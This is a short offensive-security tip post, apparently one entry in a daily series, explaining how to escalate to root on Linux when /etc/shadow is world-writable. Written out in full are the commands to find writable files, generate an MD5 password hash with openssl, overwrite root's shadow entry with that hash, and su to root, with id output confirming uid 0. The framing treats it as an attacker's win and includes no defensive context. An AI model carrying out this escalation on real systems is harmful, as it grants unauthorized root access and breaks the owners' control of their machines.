Day 65: Change Linux Root Password with Shadow File Permission Issues

If you come across /etc/shadow file on Linux systems that has the wrong permissions and allows you to write to it, then you can use it to set your own root password.

First check if you can write to /etc/shadow

find / -type f -writable 2>/dev/null | grep etc
/etc/shadow

Double check

ls -la /etc/shadow

You should see…

-rw-rw-rw-

This means that the owner, group and all users have read and write permission for the file. Big win for us.

Generate new root password & Su2Root

openssl passwd -1 -salt root pwned123

Change password

Now it’s time to open /etc/shadow in your favourite editor. As with the passwd file, each field in the shadow file is also separated with “:” colon characters, and are as follows:

• Username, up to 8 characters. Case-sensitive, usually all lowercase. A direct match to the username in the /etc/passwd file.
• Password, 13 character encrypted. A blank entry (eg. ::) indicates a password is not required to log in (usually a bad idea), and a ``*’’ entry (eg. :*:) indicates the account has been disabled.
• The number of days (since January 1, 1970) since the password was last changed.
• The number of days before password may be changed (0 indicates it may be changed at any time)
• The number of days after which password must be changed (99999 indicates user can keep his or her password unchanged for many, many years)
• The number of days to warn user of an expiring password (7 for a full week)
• The number of days after password expires that account is disabled
• The number of days since January 1, 1970 that an account has been disabled
• A reserved field for possible future use

# To start with our root user entry looked like this...
root:*:17764:0:99999:7:::
# Now it looks like this...
root:$1$root$0i6hbFPn3JOGMeEF0LgEV1:17764:0:99999:7:::

Save/Write the file.

Now just su to root.

user@box:/$ su root
Password:
root@box:/# id
uid=0(root) gid=0(root) groups=0(root)